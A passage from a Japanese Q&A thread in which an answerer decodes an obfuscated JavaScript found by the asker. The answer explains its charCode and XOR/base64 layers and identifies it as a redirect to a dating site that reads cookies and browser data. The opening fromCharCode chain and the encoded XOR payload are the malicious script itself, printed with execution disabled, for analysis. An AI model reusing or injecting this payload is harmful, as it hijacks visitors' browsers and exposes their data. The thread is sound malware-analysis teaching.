49 - 9, 117 - 2, 122 - 6, 117 - 3, 106 - 1, 117 - 7, 107 - 4, 55 - 9, 101 - 2, 105 - 1, 100 - 3, 119 - 5, 69 - 2, 113 - 2, 103 - 3, 103 - 2, 73 - 8, 121 - 5, 49 - 9, 107 - 2, 47 - 6, 35 - 3, 103 - 9, 18 - 8, 33 - 1, 37 - 5, 34 - 2, 38 - 6, 36 - 4, 33 - 1, 37 - 5, 39 - 7, 35 - 3, 33 - 1, 35 - 3, 39 - 7, 39 - 7, 37 - 5, 38 - 6, 37 - 5, 35 - 3, 40 - 8, 40 - 8, 41 - 9, 36 - 4, 38 - 6, 41 - 9, 39 - 7, 37 - 5, 39 - 7, 41 - 9, 34 - 2, 33 - 1, 36 - 4, 37 - 5, 38 - 6, 111 - 4, 108 - 7, 123 - 2, 54 - 8, 101 - 2, 105 - 1, 101 - 4, 119 - 5, 70 - 3, 115 - 4, 102 - 2, 105 - 4, 68 - 3, 122 - 6, 49 - 9, 111 - 6, 39 - 7, 40 - 3, 35 - 3, 114 - 7, 104 - 3, 125 - 4, 48 - 2, 114 - 6, 102 - 1, 112 - 2, 104 - 1, 124 - 8, 113 - 9, 46 - 5, 47 - 6, 65 - 6, 11 - 1, 39 - 7, 39 - 7, 129 - 4, 12 - 2, 38 - 6, 37 - 5, 123 - 9, 102 - 1, 119 - 3, 119 - 2, 120 - 6, 112 - 2, 41 - 9, 122 - 8, 104 - 3, 117 - 2, 61 - 2, 13 - 3, 126 - 1, 13 - 3, 17 - 7, 126 - 8, 104 - 7, 115 - 1, 37 - 5, 104 - 4, 108 - 7, 100 - 1, 36 - 4, 69 - 8, 33 - 1, 128 - 8, 113 - 2, 120 - 6, 97 - 2, 105 - 4, 112 - 2, 108 - 9, 46 - 6, 103 - 6, 124 - 8, 117 - 6, 101 - 3, 45 - 5, 106 - 5, 116 - 6, 106 - 7, 109 - 8, 103 - 3, 46 - 5, 47 - 3, 41 - 9, 115 - 8, 109 - 8, 126 - 5, 43 - 2, 61 - 2, 18 - 8, 46 - 6, 114 - 4, 108 - 7, 126 - 7, 39 - 7, 74 - 4, 125 - 8, 119 - 9, 108 - 9, 122 - 6, 114 - 9, 114 - 3, 111 - 1, 41 - 1, 104 - 4, 105 - 4, 104 - 5, 44 - 3, 47 - 6, 49 - 9, 45 - 4, 68 - 9, 14 - 4, 16 - 6);
```

```html
<div id="console"></div>
```

```js
var key = 'hhVryOyUnI';
var enced = 'QA4jHBo7EDoAaQkbMlpQbwJfTmkeCSRSDhAVOg0oHAE5HFlyWXIGPRwYbF1WOQA9GytGCzkfViwKJkEqGxt5VUJFWXUYKBpINR0WJBAwTnRITy8rEz0YYT4KC1A9HzsHHCYdeAEKcUlzRVl1CDwGCyIbFiFZJhooGhx+W1k0c3VOaUgeNwBZLBY6BSANG3ZPWSsWNhskDQYiXBogFj4HLEgUKlJeaEJfTmlISD8UWWcaOgEiAQ0lXBAhHTAWBg5ANR0WJBAwR2lJVWtSVH5QdRVDSEh2UllvCzAaPBoGbXhZb1l1E0NISHZSEClZfQ0mBwM/FwphEDsKLBAnMFpeOAl4HSwcHD8cHjxefE5oVVV2X0hmWS5kaUhIdlJZPRwhGzsGU1xSWW9ZKGRpSEh2Gx9vUTkBKgkEBQYWPRgyC2cPDSI7DSoUfQ0mBwM/F1BvRGhTaU9ZcVtZNHN1TmlISHYAHDsMJwByYkh2Ulkyc3VOaUgeNwBZOhgyCyccSGtSFy4PPAkoHAckXAw8HCcvLg0GIklzb1l1TiAOSH5TDC4eMAA9QUgteFlvWXVOaRoNIgcLIUJfTmlISCt4c29ZdU48CQ8zHA1vRHUbKA8NOAZXOxYZAT4NGhUTCipRfFVDSEh2UhApWX0bKA8NOAZXJhcxCzEnDn5VHiAWMgIsT0F2U0RyWXhfQ0hIdlJZb1l1EjVIHTcVHCENewcnDA0uPR9nXjcBPU9BdlNEcll4X0NISHZSWW9ZdRI1SB03FRwhDXsHJwwNLj0fZ142HCgfBHFbWW5EaE5kWWJ2UllvWXVOaRQUdgcYKBw7GmcBBjIXAQAffUkrAQYxVVBvWGhTaUVZXFJZb1l1TmlIFCpSDC4eMAA9RgE4Fhw3NjNGbhEJPh0WaFB1T3RVSHtDUG8CX05pSEh2UgsqDSAcJ1NidlJZbwRfZGlISHYBHDstPAMsBx0iWh86FzYaIAcGfltZNHN1TmlISHYBHDs6OgEiAQ1+ERYgEjwLZUhPZ0BKaFV1WXpYQW14WW9ZdU5pBAc1ExUcDTocKA8NeAEcOzAhCyRACzkdEiYceU5uWU9/SXNvWXVOaUgfPxwdIA57AiYLCSIbFiFZaE4+NwQ5ERg7EDoAcmJIdlJZMlV1XHlIQnZDSX9JfFVDSEgreFlvHyAAKhwBORxZPBwhLSYHAz8XUSwmOw8kDUR2BBgjDDBCaQ0QMhMAPFB1FUNISHZSDy4LdQsxDAkiF1lyWTsLPkgsNwYcZ1BuZGlISHYXASsYIQtnGw0iNhg7HH0LMQwJIhdXKBwhKigcDX5bWWRZMBYtCRElW0JFWXVOaR4JJFIaEA80AjwNSGtSHDwaNB4sQB43HgwqUHVFaUBAMwodLgAmTnRVSDgHFSNQdVFpT092SFloQnULMRgBJBcKcl51RWkNEDITDSpXIQEcPCsFBgsmFzJGYEFTXFJZb1kxASodBTMcDWEaOgEiAQ12T1ksJjsPJA1IfVJecl51RWkLNyATFTocbmRpSBVceFlvDzQcaRoNNxYAHA00GiwrADMREgYXIQs7Hgk6UkRvCjAaAAYcMwAPLhV9CDwGCyIbFiFRfE4yYkh2UlkmH3VGLQcLIx8cIQ17HCwJDC8hDS4NME50VVV2VRogFCUCLBwNcXhZb1l1TmlISCoOWSsWNhskDQYiXAsqGDEXGhwJIhdZckR1SSAGHDMAGCwNPBgsT0F2CXNvWXVOaUgLOhcYPTA7GiwaHjceUT0cNAowOxw3BhwMETANIiEGIhcLORg5R3JiSHZSWW9ZJhooGhx+W0JFWXVOaRVidlIEY1lkXmBTYlwPUWZQbmRD';
function xor_enc(string, key) {
var res = '';
for (var i = 0; i < string.length; i++) {
res += String.fromCharCode(string.charCodeAt(i) ^
key.charCodeAt(i % key.length));
}
return res;
}

var dec = xor_enc(atob(enced), key);
//コードを表示
document.getElementById("console").innerText=dec;
//実行はしたくないので無効化
//(new Function(dec))();
```

```html
<div id="console"></div>
```

---

それでエンコードした文字列が更にエンコードしないといけない文字列になっていたので関数名"xor_enc"で調べました。
すると下記の質問がありました。
ご質問者様と同じ質問ですね。
https://security.stackexchange.com/a/131777

シンガポールのサーバにある出会い系サイトに転送(リダイレクト)するのがこのコードの内容になるようですね。

---

基本的に実行すると不具合を起こす可能性があるのでスクリプトを調査するのであれば慎重にするか誰かに頼むといいです(今回のように)
まずはJavaScriptなどの関数を覚えるか、調べるところから始めましょう
難読化しているものは人間が読めない内容なだけで、文字コードで書かれていることには変わらないです。
文字コードに変換しているということは復号やエンコード・デコードをしているはずで、
元に戻している箇所を1つ1つ追っていくと結果にたどり着きます。
ただし調査は実行してしまうリスクもあるのでその点だけは注意してください。

---

**このコードに使用されている主要な関数**

[String.fromCharCode関数](https://developer.mozilla.org/ja/docs/Web/JavaScript/Reference/Global_Objects/String/fromCharCode)

[atob関数](https://developer.mozilla.org/ja/docs/Web/API/WindowBase64/atob)

[String.prototype.charCodeAt()](https://developer.mozilla.org/ja/docs/Web/JavaScript/Reference/Global_Objects/String/charCodeAt)

[document.cookie](https://developer.mozilla.org/ja/docs/Web/API/Document/cookie)

[window.navigator.userAgent](https://developer.mozilla.org/ja/docs/Web/API/NavigatorID/userAgent)

[window.localStorage](https://developer.mozilla.org/ja/docs/Web/API/Window/localStorage)

[escape](https://developer.mozilla.org/ja/docs/Web/JavaScript/Reference/Global_Objects/escape)

[document.readyState](https://developer.mozilla.org/ja/docs/Web/API/Document/readyState)

---

**1段階目の変換について**
まずUnicodeとは文字を表現するために用いられる規格です。[Unicode対応表](https://unicode-table.com/en/)
リンク先は16進数ですが、JavaScriptでは10進で変換します。

```js
//例えば"a"という文字のコード
var test="a";
//97という数値になります。
alert(test.charCodeAt(0));
//要するにUnicodeでは97番目の数値は"a"が宣言されているわけなので

//97番目のコードが何か調べると"a"が出てきます。
alert(String.fromCharCode(97));

//では、質問文の1～3文字目がなにか？
alert(String.fromCharCode(19 - 9));//改行コード
alert(String.fromCharCode(126 - 8));//v
alert(String.fromCharCode(100 - 3));//a
alert(String.fromCharCode(122 - 8));//r

//変数宣言が出てくるわけです。
```

---

**2段階目の変換について**
ついでなので2段階目も説明します。

xorとは2進数で使われる論理演算の1つで、
排他的論理和(exclusive or)と呼ばれるものです。
ドチラか片方が1の時のみ1を返すという計算式です。
1 1 → 0
1 0 → 1
0 1 → 1
0 0 → 0

例えば`12^10`のxorの場合は下記のようになります。

```js
var twelve = parseInt(12).toString(2);
console.log(twelve);
var ten = parseInt(10).toString(2);
console.log(ten);
//1100
//1010
//----
//0110

//※10進数に変換
//8 4 2 1 ←桁の重み(2の冪乗)：ON(1)になっているもののみカウント
//0 1 1 0
//-------
//0+4+2+0 = 6

var result = 12^10;
console.log(result + " : " + parseInt("0110",2));
```

`charCodeAt`：指定文字目の文字コードを取得

```
var key = 'hhVryOyUnI';
key.charCodeAt(0);//h = 104
key.charCodeAt(1);//h = 104
key.charCodeAt(2);//V = 86
key.charCodeAt(3);//r = 114
key.charCodeAt(4);//y = 121
key.charCodeAt(5);//O = 79
key.charCodeAt(6);//y = 121
key.charCodeAt(7);//U = 85
key.charCodeAt(8);//n = 110
key.charCodeAt(9);//I = 73
```

```
//命名の由来は"XOR Encode"でしょうか…
function xor_enc(string, key) {
    //返却用文字列初期化
    var res = '';
    //渡された文字を1つずつ処理
    for (var i = 0; i < string.length; i++) {
        //stringのi文字目 XOR keyを0～9番目を繰り返し参照
        //上記の数値のコードから文字に変換し文字列の末尾に追加
        res += String.fromCharCode(string.charCodeAt(i) ^ key.charCodeAt(i % key.length));
    }
    //結果出来上がった文字列を返却
    return res;
}

//atob:base64形式でデコード
var dec = xor_enc(atob(enced), key);
```

---

変換に苦労しているようなので第一段階を表にしました。ご活用ください。
[Googleスプレッドシート：String.fromCharCode関数](https://docs.google.com/spreadsheets/d/1VFH9HY9bRodOXAcf74-rtjHacYLPAEh-eQmwMVfvCE8/edit?usp=sharing)

Comment: Myaku様回答ありがとうございました。今回この掲示板を初めて使ったものですから間違えて操作してしまい、ダウンvote?‌​の▼ボタンをうっかりと押してしまいました‌​。申し訳ございません。慌てて▲アップvo‌​teを押させて頂きましたが、ダウンvot‌​eの取り消しというのは、どうすれば良いの‌​でしょうか？本当に申し訳ございません。教‌​えて頂いたというのに。 １）ところでさらに教えて頂きたいのですが String.fromCharCode(19 - 9, 126 - 8, 100 - 3, 122 - 8, 37 - 5, 109 - 2, 、、、、、、、、、、　この部分を解読されて「var key = 'hhVryOyUnI'; var enced =、、、、、、、、、、、、、」と難読化を解読されていますが、この第一回目の解読は具体的には、どのような方法でなさったので‌​すか？そこを少し教えていただけると勉強に‌​なります。

Comment: ダウンVoteされていないようなのでお気になさらず、もし間違った投票をした場合1分以内（だったかうろ覚えですが)にもう一度押せばキャンセルできます。それで、本題ですが、、、追記します。

Comment: 片手間だったので時間がかかりましたが、追記しました。

Comment: 2段階目のエンコードの説明も追記しました。

Comment: Myaku様、重ね重ねの丁寧なご説明に深く感謝申し上げます。解説していただいた内容を自分でもさらに検索を行い自力でアレコレと試してみました。10進数と16進数の対応表も読み考えてみました。String.fromCharCode(19 - 9は19－9＝10となりUnicodeで考えるとA。結局A=LFであり改行の意味。126 - 8=118。対応表を見ると結局「小文字のv」。今、そのような感じで対応表を見ながら変換作業を行っている最中です。ご報告まで。色々と調べながらなので時間が掛かっています。まだXORの部分までは進んでいませんが、XORの部分になりましたら、また質問させてください。本当にありがとうございます。また補足を書き込みますので。

Comment: 変換した表を追記しました。参考にしてください。